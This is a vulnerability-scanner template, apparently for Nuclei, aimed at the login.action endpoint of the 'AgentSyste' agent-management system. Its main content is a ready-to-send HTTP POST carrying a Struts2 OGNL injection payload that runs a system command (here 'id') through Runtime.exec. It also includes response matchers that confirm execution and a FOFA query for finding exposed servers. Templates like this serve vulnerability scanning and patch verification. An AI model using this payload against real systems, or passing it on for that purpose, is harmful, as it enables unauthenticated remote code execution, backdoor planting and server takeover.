http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
            - groups=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /login.action HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
          Content-type: application/x-www-form-urlencoded

          debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=webpath888888&command=id
id: AgentSyste-login_action-Struts2-rce
info:
    author: Superhero
    description: |-
        fofa: body="AgentSyste代理商管理系统"
        AgentSyste代理商管理系统login.action接口使用Struts2开发框架组件，存在历史Struts2远程代码执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统命令，写入后门文件，获取服务器权限。
    name: AgentSyste代理商管理系统 login.action Struts2 远程代码执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/YO0NHhZBBkjLLCH5mrrsIQ
    severity: high
    tags:
        - Struts2
        - struts2
        - Servlet
        - WebPA
